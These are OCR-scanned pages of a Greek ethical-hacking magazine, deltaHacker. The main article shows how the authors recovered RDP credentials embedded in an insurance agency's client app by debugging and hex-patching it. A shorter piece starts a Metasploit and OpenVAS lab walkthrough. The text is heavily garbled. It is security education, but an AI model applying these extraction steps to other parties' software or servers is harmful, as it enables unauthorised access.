* TO 'gbook ! Q'localhost' IDENTIFIED BY PASSWORD '*4994A78 
F85458C1F8L 
INSERT, UPDATE, DELETE ON gbook .* TO 'gbook web'Q'localhost' 


USAGE ON ' gbook b'@' localhost’ ID 
SBOF52 58C1F8D4C2' 
for gbook_web@ st: R. CT. T, UPDATE, DELETE ON gbook 
' gboo 
in 


mysql> 


Εικόνα 2 

O διακόπτης VG αλλάζει rov προεπιλεγµένο τρόπο εμφάνισης των 
αποτελεσμάτων, μέσα στο MySQL Monitor. Με τη χρήση του, ra 
αποτελέσµατα εμφανίζονται σε περιγραφική µορφή και σε λιγό- 
τερες γραμμές. 


4. Πάντα ἠθελα va επισφραγίσω Eva ρθρο µε ópouc ναυλοσυμφώνου :P 
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To deltaHacker είναι το ένα και µοναδικό 
περιοδικό µε θεματολογία το ethical 
hacking, τα δίκτυα και την ασφάλεια, τον 
προγραμματισμό και τα ηλεκτρονικά. 


To deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για τρίτη χρονιά στη σειρά 
έρχεται κατευθείαν σ' εσάς. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους WG άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα 
δίκτυο που αρχίζει και τελειώνει HE TO Facebook 
και το Twitter, τότε είναι 109% βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε µήνα. 


Παραγγείλετε τώρα µία από τις συμφέρουσες 
συνδρομές από TO 
http://deltahacker.gr/pdf120rder 
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Mesos Pap 


Δεν ἐχει περάσει c 
προσωπικό τραπεζῶν £kc 
TOU µια εφαρµογή για Wind 
προσωπικά δεδομένα, ὅπως αριθμό 3 
(σε µορφή IBAN) κ.λπ. Όλα καλὰ, µόνο 
ἦταν εντελώς τρύπια :/ Αρκεί να σας πούμε ότι για την κοινωνία µε 
τον κεντρικὀ Server πραγματοποιούσε µια σύνδεση RDP, µε τα σχετικά 
credentials να διακινούνται χωρίς καμία απολύτως προστασία... 


p 


The IBAN-application incident 


P 


To site του ασφαλιστικού φορέα ζητού- 
σε απὀ τους Χρήστες να κατεβάσουν 
va εκτελἐσιµο αρχείο µε το ὀνομα 1. 
LoginIban.exe — απαράδεκτο ὀνομα, av 
θέλετε τη γνώµη µας :) Όταν το εκτε- 


Description 
λούσε κανείς, πραγματοποιούσε µια File description Seff-Exractor 
σύνδεση σε κάποιον server Tou ασφαλι- Type Application 
OTIKOU οργανισμού, µε χρήση rou πρω- File version ΤΌ 
TOKOAAOU RDP (http://en.wikipedia.org/ ο. ο 
wiki/Remote Desktop Protocol). Αμέσως c x Copyright © 2012 
µετά, η εφαρµογἠ φόρτωνε κι εκτελού- Size 519 KB 
σε αυτόματα µια φόρμα σε MS Access. H Date modfied 15/1/2014 10:31 ny 
φόρμα ζητούσε and τον χρήστη διάφο- Language Engish (United States) 


Original filename SelfExtractor.exe 


pa npoownikd δεδοµένα κι όταν αυτός 
τα ἐδινε, TO πρὀγραμμα τα αποθήκευε σε 
µια βάση δεδοµένων στον server. Ako- 
λουθούσε µια αποσύνδεση και το πρὀ- 
γραµµα τερματιζόταν. Στο παρὀν άρθρο 
δεν θα αναλωθούμε σε κριτική, οὐτε θα 
περιοριστούμε σε γενικἀ σχόλια περὶ 


ασφάλειας και προσοχἠς. Θα εστιάσουµε Remove Properties and Personal Information 

στην τεχνικἠ πλευρά του ζητήματος και 

θα δούμε µε ποιον τρόπο θα μπορούσε Apply 
ἑνας κακόβουλος χρήστης va μάθει ra 

credentials, µε τα onoia γινόταν η σύν- Εικόνα 1 


Πολλές φορές, οι NAnpo@opies που παίρνουμε µε 
éva απλὀ δεξί κλικ ΚΙ επιλογή rou Properties εἶναι 
όκρως διαφωτιστικές ;) 


δεση στον server του οργανισμού. 


Ὥρα για δράση 


Προφανώς, το πρώτο πράγµα που κάναμε ἦταν va κατεβάσουμε το πρόγραμμα. 
Ὅπως διαπιστώσαμε αμέσως, ἦταν Eva αρχείο τύπου self-extract (εικὀνα 1). Ως 
γνωστὸν, τα αρχεία αυτού του τύπου λειτουργούν ως Δούρειοι Ίπποι, αλλά µε την 
καλή £vvoia. Μόλις εκτελέσει ο χρήστης Eva self-extract, αυτό αποσυμπιἐζει όλα τα 
περιεχὀμενὰ του, στα οποία συγκαταλέγεται συνήθως και κάποια εφαρµογἠ. Πολὺ 
συχνὰ, μετὰ την αποσυµμπἰεση ακολουθεἰ και η αυτόματη εκτέλεση της εφαρμογἠς. 
Το ζητούμενο µε τα προγράμματα rou εἰδους εἶναι το τι ακριβώς εξάγουν και που TO 
τοποθετούν. AUTO όμως εἰναι µια ἄλλη ιστορἰα. 


Αφού εκτελέσαμε το πρὀγραμμα, καταλάβαμε anó τη συμπεριφορά του ὁτι µε Kà- 
ποιον, ἄγνωστο τρὀπο, εἰχε ξεκινήσει την υπηρεσία Remote Desktop. To πρὀγραμµα 
nou κατεβάσαμε μὰς συνέδεσε αυτόματα σε κάποιον server TOU ασφαλιστικού οργα- 
νισμού — και μάλιστα χωρὶς να ζητήσει κανένα διαπιστευτἠριο. AUTO σήμαινε ὁτι τα 
credentials βρίσκονταν αποθηκευμένα εντὸς της εφαρµογἠς. H πρώτη σκέψη nou 
κάναμε ἦταν να σνιφάρουμε το δίκτυο, WOTE να τσιμπήσουμε τα credentials τη στιγ- 
μὴ που εκπἐμπονται. Aurr η σκἑψη ὁμως ἦταν πρὀχειρη και μᾶλλον δεν θα απἐδιδε 
καρπούς, αφού τα στοιχεία του εἰδους πιθανώς μεταδίδονται κρυπτογραφημένα. 
Εμεἰς βέβαια προσπαθήσαμε, αλλά δεν καταλήξαμε σε κανένα χρήσιμο αποτἐλεσµα. 
Εγκαταλείψαμε ETO! την προσπάθεια γι' αργότερα: αν αποτύγχαναν òda τ' ἄλλα, 
θα επιστρἐφαµε (εικὀνα 2). (Παρεμπιπτόντως, av τα κατάφερε κανεὶς µε αυτόν τον 
τρόπο, µε χαρὰ θα θέλαμε να μάθουμε noc ακριβὠς.) Το μόνο nou εἰδαμε εμείς κατὰ 
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| [] capture2.pcapng [Wireshark 1.8.3 (SVN Rev 45256 from /trunk-18)) ου  . C" Es See 
File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help —— 
üaumeaicuxeoxeeri([I aaao ank 8 
|| Fier | [=] Bepression.. ctesr Apply. seve 


|No. Time Source Destination Protocol Length Info ^ 
77 4.29671500 Cisco 77:41:04 or-STP 60 Conf. Root = 32768/1/00:17:0e:77:41:00 cost = 0 Port = Ox8004 


79 4.39523600 192.168.100.63 ΕΕ] τςρ 66 12724 > appserv-http [SYN] Seq=0 win=8192 Len=0 MSS=1460 WS-256 SACK_PERM=1 
| 83 4.41371500 193.92. 70. 41. ue 2 73 appserv-http > 12724 [Ρ5Η, ACK] Seq=1 Ack=48 win-65488 Len=19 


85 4.43935200 193.92. 70.41 p ΕΣΩ 1506 appserv-http > 12724 [ACK] 561-20 Ack=486 win=65050 Len=1452 
86 4. 44003200 193. 92. 70. 41. 2 2 198 appserv-http > 12724 [PSH, ACK] Seq-1472 Ack=486 win=65050 Len=144 


90 4.45040000 193. 92. 70.41 pu 2 60 appserv-http > 12724 [ACK] Seq=1616 Ack=506 win=65030 Len=0 
91 4. 45138200 193. 92.70.41 2 5 65 appserv-http > 12724 [PSH, ACK] Seq=1616 Ack=506 win-65030 Len=11 


@ Frame 79: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on i 

5) Ethernet II, Src: HewlettP f4:fa:c9 (e4:11:5b:f4:fa:c9), DSt: tet! 0 oa IM e tea eam 
8 

Β 


Sequence number: 0 (relative sequence number) 
Header length: 32 bytes 
OHINJSIIOUSUDZIGYH)SER a a CCS RU an 
window size value: 8192 
[Calculated window size: 8192] 
5 Checksum: Ox2c94 [validation disabled] 
® Options: (12 bytes), Maximum segment size, No-Operation (NOP), window scale, No-Operation (NOP), No-Operation (NOP), SACK permitted 


0 90 34 20 47 40 00 80 06 99 00 co a8 δὲ 3 ε1 5 
46 29 31 b4 de 2 da 00 00 00 00 $0 06 
20 00 2c 94 00 0S οἱ 05 b4 01 03 03 08 01 OL 


Θ [© | Destination Port (tep.dstport), 2 bytes | Packets: 414 Displayed: 414 Marked: 0 Load time: 000.535. - | Profile: Default 
== — = = 


Εικόνα 2 
Application Server εν δράσει! 


την ἐναρξη της σύνδεσης, ἦταν oT! o client καλεί την υπηρεσία "4848 - Application 
Server", που σημαίνει ὁτι η εἰσοδος µας στον server ToU οργανισμού γίνεται ελεγχό- 
μενα, μέσα ano κάποιον Application Server. Μέχρι εκεἰνη τη στιγμή εἰχαμε ελάχιστα 
δεδομένα: 


1. Τη διεύθυνση IP του server 
2. To port στο οποίο ακούει η υπηρεσία (4848) 
3. To εἶδος της υπηρεσίας (Application-Server, µέσω HTTP) 


Γνωρἰζαμε επἰσης ὁτι το RDP χρησιμοποιεἰ συνήθως τη θύρα 3389, αλλά δεν ἡμα- 
σταν απόλυτα σίγουροι ότι ἴσχυε το ἴδιο και για αυτόν τον server. O διαχειριστής θα 
μπορούσε να εἶχε αλλάξει τη default θύρα της υπηρεσίας (γίνεται εὐκολα, µε λίγο 
σκάλισμα στο registry). Το μόνο που γνωρίζαμε µε βεβαιότητα ἦταν OT! χρησιµοποι- 
εἶται το RDP (εικόνα 3). Προς στιγμήν σκεφτήκαμε va τρἐξουµε TO nmap, αλλά η 
napouoia £vógc firewall (κἀτι διόλου απίθανο) θα µας εμπόδιζε να βγάλουμε ασφαλἠ 
συμπεράσματα. Έτσι, αποφασίσαμε να ψάξουμε στο δικὀ µας μηχάνημα. Ἡμασταν 
σίγουροι ότι όλες οι απαντήσεις βρίσκονταν μέσα στο 1_LoginIban.exe. 


Αποτρέποντας τη διαγραφή 


Το συγκεκριµένο πρὀγραμμα αποσυμπιἐζει διάφορα αρχεἰα σε κἄποια ἄγνωστη TO- 
ποθεσἰα και στη συνέχεια τα εκτελεἰ. Αν εντοπίσουµε αυτήν την τοποθεσίἰα, θα δού- 
µε τα αρχεία κι ενδἐχεται να βγάλουμε περισσότερα συμπεράσματα. O πιο συνη- 
θισµένος κατάλογος που χρησιμοποιείται ano τα προγράµµατα Tou εἰδους εἶναι o 
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Gee ee ri 


%temp%. Πρόκειται για τον κατάλογο 
στον οποἱο ¿xouv πλήρη πρὀσβαση ὁλες 
οι εφαρμογές nou τρἐχει ἑνας χρήστης 

των Windows. Σε GUTOV τον κατάλογο | irc ee σα ee toe PARN 
δεν φοβόμαστε NOTE το ενδεχόμενο TOU λος ο. 
overwrite κάποιου ἄλλου, προσωρινού Type: Remote Desktop Connection 
αρχείου, που τυγχάνει va ἐχει TO ἰδιο Reacts computer. ρω. 
ὀνομα. AUTO δεν θα μπορούσε να συμβεί | rosse again for connections to this computer 
ποτὲ, διότι κᾶθε φορά nou επιχειρούμε 
να κάνουμε κάτι εντὸς TOU συγκεκριµέ- 
νου καταλόγου, τα Windows δηµιουρ- ee 
youv αυτόματα vav υποκατάλογο µε Λίγο πριν πραγματοποιηθεί η σύνδεση, τα Windows 
τυχαἰο ὀνομα και "μας τοποθετούν" εκεὶ ζητούν την ἁδειά µας yia τη χρήση του πρωτοκὀλ- 
μέσα. Enionc, πρὀκειται για µία σχετικἁ Aou RDP. 
κρυμμένη τοποθεσία, στην onoia εἶναι 

απίθανο να βρεθεὶ τυχαία ἑνας απλὀς χρήστης. Παρεμπιπτόντως, γι' αυτούς ακριβὼς 
τους λόγους, ra malware τιμούν τον συγκεκριµένο κατάλογο πολύ συχνά. Ας επι- 
στρἐιψουµε ὁμως στο θέμα µας. 


(5) Show Details 


Πα va ξέρουμε τι μὰς γίνεται, ξεκινήσαμε διαγράφοντας όλα τα περιεχόμενα του 
%temp%. H διαδροµἠ για τον εν λόγω κατάλογο εἶναι c:\Users\<USERNAME>\ 
AppData\Local\Temp, αλλά στον file explorer μπορούμε απλὰ να πληκτρολογήσουμε 
TO ὀνομά του (μαζὶ µε τα σύμβολα 9o, αριστερά και δεξιά). Αν δοκιμάσετε va δια- 
γράψετε κι εσεἰς τα περιεχόμενα του Ytemp%, θα διαπιστώσετε Ori! εἶναι αδύνατο 
να σβηστούν τα πάντα. Αυτὸ εἶναι φυσιολογικό και δεν πρέπει va σας ανησυχήσει. 
Αφού καθαρἰσαµε rov Y%temp%, ξανατρἑξαµε το πρόγραμμα. Όταν ενεργοποιήθηκε 
το UAC, ζητώντας την ἄδεια για την πραγματοποίηση µιας σύνδεσης RDP (εικόνα 3), 


File View Debug Plugins Options Window Help 


LETT CEU E 


E:] 
E8 74580200 
8080 saroerre| ten 


Login1.00472138 


F PTR $9: LEEP-C61, EBX E 
EX COMME C ON go A 1a 
1 CEBP~ j 7 
8985 SCFFFFFF| NOU DWORD PTR SS:LEBP-C41,Ei Hr gO- « Local » Temp » ckz_7R5S 
Εκ μι πας η) #2 
Lunam pot Tm 
ES δοέθοοοο |CALL 1 Login T. QOA0RO40 0 Organize v Include in library v Share with v E 
8985 44FFFFFF| NOU DWORD PTR SS: [EBP-BC), EAX EFL, = 
9086 aCFFFFFF LEA EAX, DUORD PTR SS: ΓΕΕΡ 041 STO. ES (Nama 
C785 48FFFFFF|HOU DUORD PTR 55:[ΕΒΡ-Β81,5 5τ t Favorites F 
$270 AGERRE που CUORD PIR SSLEDP-BAY EBX 
FEIS 78014800 CALL DWOR E<LSHELLS2. Shel lExecu| SHELL32. She LlEkecuteExW i ΕΕ Desktop D 
δΕ64 07000000] JE 1 Loain I, 00403SEA Té Gui LounchRDP.ere 
8080 BCFCFFFF| LER EC; DUORD PTR SS: [EBP-9441 dr 38 Download: 
EB 52680000 |CALL 1 Loginl.00409670 $33] Recent Places 
Sioe BCFCFFFF LER ERR, DUORD' PTR 8S: LEBP-344) rer a 
BCE FCU, Γη 
PUSH EAR AV 
PUSH 1. LoginI.Q04GB7CC. ASCII "RutoEx it” 
Hoy BYTE PTR S5:CEBP—41, 13 D Projects 
Ὁ CloudDrives 
a Images 
4 
O Libraries 
-ὃ Documents Ε 
αἳ Music 
|.Login1.88458398 (i) Pictures 
73 99 65 00/20 00 73 E videos 


Εικόνα 4 
Me τη βοήθεια rou Olly καταφέραμε va µπλοκάρουµε τη λειτουργία του npo- 
γράμματος, πριν διαγράψει ra αποσυμπιεσμένα αρχεία. 
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[di File Edit Search Insert Project View Format Column Macro Scripting Advanced Window Help 
+> D66H8/498/ 8/210) 8101s “|Meat ὃν ΕΗ Εἰ E 


ῇ 1_LoginIban.exe 


9-34 Ὁ 4 5 τς τ Ἐς ΟΞ 
6665a296h: 66 53 68 65 óC 6C 45 78 65 63 75 74 65 μι ; W.ShellExecuteEx 
6605a2a6h: ót ; W.SHELL32.d11.2. 
6605a2b6h: 72 ; GetLastError..8. 
6605a2c 6h: 62 ; LocalFree.u.SetF 
6605a2d6h: 6F ; ileTime.6.LocalF 
6605a2e 6h: ót ; ileTimeToFileTim 
0005a2f 6h: 56 ; e.T.GetFullPathN 
6665a366h: 46 ; ameW..S.GetFullP 
6665a316h: 81 ; athNanefi..-.GetT 
6605a326h: 61 > empPathW..q.GetT 
6605a336h: 61 ; empPath&..F.GetM 
6605a346h: 6D H 
8805235 6h: 65 
8805a366h : 88 
8865a378h: 72 
6665a38 6h: 69 ; GetFilefittribute 
6665a396h: 65 ; sW..E.CreateDire 
8665a3a6h: 65 5 ctoryW..c.SetCur 
6665a3b6h: 72 ; rentDirectoryW.. 
6665a3c 6h: 74 ; 5.SetCurrentDire 
6665a3d6h: 65 ; ctoryA..n.SetFil 
0005a3e 6h: ; eAttributesW.. . 
8005a3f0h: 52 ; RemoveDirectoryW 
6665a466h: 00 ; ..B.CreateDirect 
6605a4160h: óF ; oryfi..o.SetFilef 


«| 


r 


J 
η 


Pos: 5a35fH, 369503, CO Mod: 15/1/2014 10:31:42 mp File 532022 INS 


Εικόνα 5 

Εδώ γίνεται χρήση των εντολών rou Windows API, 
οι οποίες διαγράφουν αρχεία. To µόνο που έχουμε va 
κάνουμε εἰναι να τις απενεργοποιήσουμε. 


πατήσαμε ro Cancel. Βλέπετε, παρακολουθώντας τον κατάλογο %temp%, εἰδαμε Ori 
εἰχε δημιουργηθεί ἑνας νέος υπὀ-κατάλογος, µε κἄποιο τυχαίο ὀνομα. Bingo! Ἠμα- 
σταν σίγουροι oT! εκεἰ μέσα θα βρἰσκαµε ὁλα τα αρχεία που εξάγει το πρόγραμμα του 
ασφαλιστικού οργανισμού. Όταν ανοἰξαµε τον κατάλογο, όµως, βρήκαμε το απὀλυτο 
τίποτα. Τελικά, ο self-extractor δεν ἦταν και τόσο απλοϊκός. Υποθέσαµε λοιπὸν Ori 
εξάγει τα αρχεία, εκτελεί αυτό που πρέπει κι αµέσως µετά τα διαγράφει. Το εργαλείο 
που σκεφτήκαμε να χρησιμοποιήσουμε σε αυτή τη φάση, ἦταν o Olly debugger. Aei- 
τε Ta βήματα που (υποθέἑσαµε OT!) ακολουθεἰ το πρὀγραμμα: 


1. Εξαγωγἠ αρχείων 
2. Εκτἐλεση αποσυμπιεσµένης εφαρµογής 
3. Διαγραφή αρχείων 


AUTO που σκεφτἠκαµε ἦταν va τρἐξουµε τον debugger και κάνοντας trace (ἡ Tono- 
θετώντας va break point στο κατάλληλο σημείο) να διακόψουμετο πρόγραμμα λἰγο 
πριν το βήμα 3. Με αυτόν τον τρόπο θα naipvape στο πιάτο όλα τα αρχεία nou ano- 
συμπιἑστηκαν στο βήμα 1. Περιττό να σας πούμε OT! αυτή η θεωρία επαληθεύτηκε 
πλήρως (εικόνα 4). Πριν προχωρήσουμε στη μελέτη των αρχείων που τσιμπήσαμε, 
ENITPEWTE µας va αναφέρουμε ἑναν ακόµα τρόπο ue rov οποίο θα μπορούσαμε va εἰ- 
Χαμε εργαστεἰ. Av avriueronicaue Eva ἐξυπνο malware, που διέθετε anti-debbuging 
χαρακτηριστικά, δεν θα μπορούσαμε να κάνουμε trace, οὐτε να θέσουμε break 


74 


The IBAN-application incident 


P 


πι αυ - PEE υπ RSS ES τα 


-.----.-- 
QU « LocalDisk(C) » Users p meme, AppData > Local » Temp » ckz ΝΟ84 IAE p 


| Organize v Include in library v Share with v Burn New folder =~» απ 0 


2 
^ 


ἋΣ Favorites 3 Name Date modified Type Size 


| BE Desktop [531 Loginlban.bat 14/1/2014 10:40 pu Windows Batch File 1KB 
n Downloads ui LaunchRDP.exe 17/12/2013 12:18 pp Application 112 KB 
ὯΙ Recent Places 


B av 


Libraries 
B Documents 
2 Music 

> (ES) Pictures 
Ei videos 


n 


wj Homegroup 


1l Computer 
& Local Disk (C:) 
cs HP. RECOVERY (t 


un TOI € {Ελ 


k 2 items 


Εικόνα 6 
Τελικά, καταφέραμε va GNOTPEWOULE τη διαγραφή ue τη Bon- 
θεια ενός απλού hex editor. 


points. Σε αυτή την περίπτωση θα έπρεπε να φερθούμε πιο πονηρὰ. Θα έπρεπε va 
βρούμε την εντολἠ που πραγματοποιεί τη διαγραφή (το βήμα 3) και va την απενερ- 
γοποιήσουμε. Π' auth την δουλειά αρκεἰ ἑνας hex editor. Το μόνο που έχουμε να 
κάνουμε εἶναι να avoi&oupe το εκτελέσιμο και να ψάξουμε την εντολἠ DeleteFile. 
Εμεἰς κάναμε *kai* αυτό και μπορείτε να δείτε τα ευρήματα στην εικόνα 5. Οἱ σχετι- 
KEG EVTOAEG του Windows API εἶναι οι DeleteFileW (Unicode) και DeleteFileA (ANSI). 
Αλλάζοντας την DeleteFileW σε DeleteFileA, το πιο πιθανό εἰναι να αποτύχει το npó- 
γραμμα και τα αρχεία να παραμείνουν στο δίσκο. Αφού κάναµετη σχετικἠ επἐμβαση, 
αποθηκεύσαµε το εκτελέσιμο, βγήκαμε ano Tov hex editor κι εκτελἐσαµε το npó- 
γραμμα ξανὰ. Όπως θα δείτε στην εικὀνα 6, το κολπάκι µας λειτούργησε κανονικἀ. 


Εξετάζοντας τα ευρήματα 


Το πρόγραμμα του ασφαλιστικού οργανισμού δημιουργούσε τα αρχεία 1_LoginIban. 
bat και LaunchRDP.exe. To batch file περιείχε τα εξής: 


@echo off 
@echo. 
@echo %cd% 
cls 
@echo Start Section 
call "%cd%"\launchrdp.exe 1.1.1.1:4848 3389 string1 string2 string3 0.0.0 
@echo. 
Οι πρὠτες NEVTE γραμμὲς, ὁπως και η τελευταία, εἶναι άχρηστες και κατὰ πᾶσα πιθα- 
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νότητα ἐχουν ξεμείνει απὀ κάποιο δοκιµαστικὀ στάδιο. H ουσία βρίσκεται στη ypap- 
un 6! Κατ' αρχάς, εκεἰ καλείται το πρόγραμμα launchrdp.exe. Με µια αναζήτηση στο 
Internet διαπιστώσαμε ὁτι TO εν λόγω πρὀγραμμα δημιουργεὶ συνδέσεις RDP ano τη 
γραμμή εντολών και δέχεται τις ακόλουθες παραμέτρους: 


e Servername (string) 

e Port (integer, usually 3389) 

e Username (string) 

* Domain (string) 

e Password (string) 

e Console (integer, specify 0 for false and 1 for true) 

e RedirectDrives (integer, specify O for false and 1 for true) 
e RedirectPrinters (integer, specify O for false and 1 for true) 


Σε αυτό το στάδιο ἦταν όλα ξεκάθαρα: Γνωρίζαμε τη δράση του προγράµµατος 1_ 
LoginIban.exe µε κάθε λεπτομέρεια, εἰχαμε ξεσκεπάσει το εργαλείο µε το οποίο yi- 
νόταν η σύνδεση στον Server και, το σημαντικότερο, εἰχαμε μάθει Ta credentials yia 
τη σύνδεση. 


Αν και δεν θἐλουµε να κάνουμε κριτικἠ στον ἄνθρωπο που δημοσίευσε αυτό το npó- 
γράμμα, πρέπει να πούμε OT! πρωτοτύπησε. Ακόμα και σε Evav TONIKO server, που εκ 
πρὠτης μοιάζει να εἶναι απὀλυτα ασφαλἠς, κανεὶς δεν µπορεί να εἶναι ἦσυχος — ὀχι 
όταν Ta credentials που πληκτρολογούν οι χρήστες εκπἐμπονται µη-κρυπτογραφη- 
μένα. 


T Fite Edit - n Macro Scripting Advanced Window Hep — |- |a] 


|@+>D66E|498/8/5|8/B/0/+ ο] "144 fn af & S| El 


1 Gecho off 

2 Gecho. 

3 Gecho ἃσαξ 

4 cls 

5 Gecho Start Section . . . . 
6 call "icdi"Mlaunchrdp.exe AGAGA AAE 3389 summis DIGDE umen 0.0.0 


7 Gecho. 


T 


« m r 
|agingsmiazttcugaumuuiry ea i885 *|[G*| 


Ln6, Col 1, CO DOS Mod: 14/1/2014 10:40:04 μμ File Size: 156 INS, 
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Στην 3η χρονιά και συνεχίζουμε ακάθεκτοι! 


Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 


Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 


Έ twitter.com/deltaHacker 
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Metasploit και OpenVAS: Συνάντηση κορυφἠς! 


Metasploit και OpenVAS: Συνάντηση Kopugnc! 
ri 


To exploitation, στο οποίο ro Metasploit τα πηγαίνει τόσο καλά, σηµαίνει εκμετάλ- 
λευση αδυναμιών ασφαλείας. H δε ανίχνευση τἐτοιων αδυναμιών εἶναι µια δουλειά 
την οποία γνωρίζει καλά το OpenVAS. O pen-tester --ερασιτέχνης ἡ επαγγελματίας, 
δεν έχει σηµασία-- κερδίζει πολλά ano µια εφαρµογή σαν ro OpenVAS. Συνήθως 
βέβαια εἶναι αρκετἀ ἐμπειρος, ὥστε να µην ro θεωρεί Ευαγγέλιο. Ξεκινώντας WOTO- 
co ano τα vulnerability scans της εφαρμογἠς, καταλαβαίνει προς ra πού πρέπει va 
κινηθεἰ προκειµένου να εκμεταλλευτεί στην πράξη αδυναμίες — ενδεχομένως και 
να δικαιολογήσει το μισθό του :P Πράγματι, Ta reports που παράγει το OpenVAS για 
κάθε vulnerability scan ἐχουν διπλἠ χρησιμότητα: Αφενός αποτελούν πολύτιμο UAI- 
KO για την τελικἠ αναφορά nou θα παραδώσει o pen-tester, αφετέρου τον βοηθούν 
να εστιάσει τις προσπἀθειἑς του yia απὀκτηση πρὀσβασης σε συγκεκριµένα, ευπαθἠ 
συστήµατα και υπηρεσίες. 


Όπως εξάλλου θα γνωρίζετε, ro Metasploit οργανώνει συστήματα (hosts), υπηρε- 
σἰες (services) και αδυναμίες (vulnerabilities, vulns) σε βάσεις δεδοµένων, διευκο- 
λύνοντας ETO! σηµαντικἀ το ἐργο του pen-tester. Διαθέτει μάλιστα κι Eva plugin, 
το οποίο του επιτρέπει να επικοινωνεὶ απευθεἰας µε το OpenVAS. Στο παρὀν άρθρο 
ξεκινάμε απ' αυτό ακριβώς ro plugin και πολύ σύντομα ψάχνουμε για αδυναμἰες στο 
τοπικὀ δίκτυο, µε τη βοήθεια του OpenVAS Scanner. Τα αποτελέσµατα της peu- 
νας ra εισάγουµε στη βάση rou Metasploit και, τέλος, επιχειρούµε v' αποκτήσουμε 
πρόσβαση σε ευπαθἠ συστήματα. Ta Metasploit και OpenVAS εἶναι εγκατεστημένα 
σε διαφορετικἀ μηχανήματα, τα οποία αμφότερα βρίσκονται στο |διο τοπικὀ δίκτυο. 


Σηµείωση. Πα την καλύτερη κατανόηση όλων όσων ακολουθούν, βοηθά 
σημαντικἁ αν ἔχετε παρακολουθήσει ra deltaCast 501611 και 502601 (BA. 
http://deLtahacker.gr/deltacast-s@1e11 καὶ http://deltahacker. gr/deltacast- 
s02e01). Av θέλετε va NMEIPALIATIOTEITE KI εσείς στο δικὀ σας (εικονικὀ ἡ αλη- 
θινὀ) δίκτυο, φτιάξτε ΚΙ Eva box/VM σε ρόλο OpenVAS server. Αναλυτικές 
οδηγίες θα βρείτε στο άρθρο που αρχίζει ano τη σελίδα 42 του παρόντος 
τεύχους. 


Συνεργασία Metasploit και OpenVAS 
Εργαζόμαστε απὀτο Kali Linux κι έχουμε ἡδη ξεκινήσει το msfconsole rou Metasploit. 
To plugin για το OpenVAS φορτώνει έτσι: 

msf > load openvas 

[*] Welcome to OpenVAS integration by kost and averagesecurityguy. 

[*] 

[*] OpenVAS integration requires a database connection. Once the 


[*] database is ready, connect to the OpenVAS server using openvas 
connect. 


[*] For additional commands use openvas help. 
[*] 
[*] Successfully loaded plugin: OpenVAS 


Αμέσως πληροφορούμαστε ano ro plugin ότι, προκειµένου να υφίσταται η συνερ- 
yaoia µε ro OpenVAS, ro Metasploit πρέπει να μιλάει µε κἄποια βάση δεδοµένων (εξ 
ορισμού εἶναι η PostgreSQL). Σε περίπτωση nou ἐχετε αμφιβολίες για το av αυτὸ 
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ισχύει και OTN δικἠ σας εγκατάσταση διαβάστε αυτό το άρθρο, oro site του περιο- 
δικού: 


http://deltahacker.gr/kali-wifi-pentest-lab 
(Σας ενδιαφἑρει κυρίως η ενότητα "Οι UNNPEDIES rou Kali και ro Metasploit".) Τώρα, 
avd πάσα στιγµἠ μπορούμε να δίνουμε 

msf > openvas_help 


και va naipvoups µια λίστα µε ὁλες τις εντολὲς που καταλαβαίνει ro plugin, οµαδο- 
ποιημένες σε κατηγορἰες. Κάθε φορά που θέλουμε βοήθεια yia µια συγκεκριμένη 
EVTOAN, γράφουμε απλά το ὀνομά της και πατάμε [Enter]. Ας δούµε την εντολἠ για 
τη σύνδεση στον OpenVAS server, την οποία χρειαζόμαστε ἆμεσα yia να συνεχίσου- 
HE: 

msf > openvas_connect 

[*] Usage: 

[*] openvas connect username password host port <ssl-confirm> 
Πα την nepinroor| µας, ισχύουν τα ακόλουθα: 


ο TO username του ενὸς και μοναδικού χρήστη στον OpenVAS server εἶναι 
ovasadmin (και πρὀκειται για Tov administrator) 


ο TO password Tou ἰδιου χρήστη εἰναι επίσης ovasadmin 
ο o OpenVAS server βρίσκεται στο 192.168.85.95 (παράμετρος host) 
e o OpenVAS Manager ακούει yia συνδέσεις απὀ ro port 9390 
Πα va εγκαθιδρύσουµε τη σύνδεση, λοιπόν, γράφουμε: 
msf > openvas_connect ovasadmin ovasadmin 192.168.85.95 9390 ok 


[*] Connecting to OpenVAS instance at 192.168.85.95:9390 with username 
ovasadmin... 


[*] OpenVAS connection successful 


Παρατηρήστε ὁτι στη θἐση αυτού Tou <ssl-confirm> βάλαμε ro ok, ὥστε να γίνει 
αποδεκτὀ το πιστοποιητικὀ TOU server. Πάμε να δούμε αν υπάρχουν Non targets: 


msf > openvas_target_list 


[+] OpenVAS list of targets 


ID Name Hosts Max Hosts In Use Comment 

e Localhost localhost 1 e 

1  SingleWinHost 192.168.85.5 1 1 Must be the domain 
controller 


Ωραία. Προφανώς και υπάρχει To target ονόματι Localhost, το οποίο amopa στο 
μηχάνημα ὀπου κατοικεἰ το OpenVAS. Όσοι ἐχετε παρακολουθήσει το deltaCast 
502601, ξέρετε OT! το Localhost target εἶναι προκαθορισμένο και δεν µπορεί va δι- 
αγραφεἰ. Το ἄλλο target στη λίστα, αυτὸ µε ὀνομα SingleWinHost, ἐχει προφανώς 
οριστεἰ κἄποια ἄλλη στιγμὴ, ἴσως μέσα ano ro web panel rou Greenbone Security 
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Assistant (GSA). Ας δούμε ropa και τη λίστα HE τις εργασἰες (tasks) Tou OpenVAS 
Manager. Εἶναι άραγε kevrj; Κοιτάξτε, μπορεί να εἶναι, μπορεί και ὀχι. Αλλά δεν χρει- 
ἀζεται ν' αναρωτιόμαστε: 


msf > openvas_task_list 
[+] OpenVAS list of tasks 


ID Name Comment Status Progress 


0  SingleWinHost Must be the domain controller Running 64 


Na λοιπὀν που υπάρχει uia εργασία, η οποία μάλιστα τρέχει GUTH τη στιγμὴ! AUTÒ 
το καταλαβαίνουμε ano τη στήλη Status. And τη δε στήλη Progress, στα δεξιά της, 
βλέπουμε τα ποσοστά εκπλήρωσης κάθε εργασίας στη λίστα. Στο παράδειγμά µας 
